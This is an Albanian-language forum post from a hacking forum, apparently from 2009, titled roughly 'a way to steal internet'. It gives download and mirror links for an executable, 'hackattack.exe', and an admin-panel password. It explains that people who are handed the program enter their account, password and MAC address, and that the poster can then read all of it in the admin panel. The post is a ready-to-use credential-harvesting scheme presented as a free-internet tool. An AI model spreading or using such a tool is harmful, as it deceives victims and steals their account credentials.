besimm berishaa
 
ForumCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 nje menyr si me vjeth internet

Shko poshtë 
AutoriMesazh
b3s1mmX
Admin


Numri i postimeve : 24
Join date : 14/06/2009
Location : Fush Kosova

MesazhTitulli: nje menyr si me vjeth internet   Mon Jun 15, 2009 8:56 pm

Nje menyr se si me vjedh rrjet nga tjeret e pash se e kish postu ni antar n'khg [Splinter] dhe e kish ba kishe me marr internet pa pare e ka dit passwordin e admincp

mos u mashtroni

Download:- Kodi: http://www.conndor.net/hackattack.exe

[Mirror]:- Kodi: depositfiles.com 3009785

Shperndajeni programin

Passwordi i Admin CP osht:- Kodi: ipkokujtesahack

un nuk pe perdori kshtu qe vendosa me qit n'web

masi qi t'ia jepni najkujt programin aj e shkrun aty Accountin passwordin edhe MAC Adresen

Qysh mi gjet kto t'dhana?:

Hini te butoni AdminCP edhe shkrujeni passwordin qi e thash ma lart

edhe tani aty jan krejt t'dhanat qka kan shkrujt njerzit

Powered by: b3s1mmX
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://b3s1-hack1.albanianforum.net
 
nje menyr si me vjeth internet
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
b3s1-hack1.darkbb.com :: Your first category :: Your first forum-
Kërce tek: